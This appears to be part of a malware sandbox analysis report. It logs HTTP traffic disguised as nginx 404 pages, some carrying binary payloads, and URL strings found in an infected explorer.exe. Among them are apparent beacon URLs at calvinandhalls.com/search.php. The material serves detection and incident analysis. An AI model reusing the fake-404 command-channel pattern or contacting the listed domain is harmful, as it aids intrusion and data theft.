Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:54:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:55:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:55:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:55:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1764575122.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1763344774.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1762910279.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1765842009.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1761280775.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1763817484.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1763817484.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/
Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/5
Source: explorer.exe, 0000000B.00000002.2707106638.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 0000000B.00000002.2707106638.00000000009E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/earch.php
Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/p
Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2667025183.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4176755346.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4176575408.0000000001318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4176400478.0000000000827000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4176402726.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php
Source: explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2667025183.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4176755346.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4176575408.0000000001318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4176400478.0000000000827000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4176402726.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
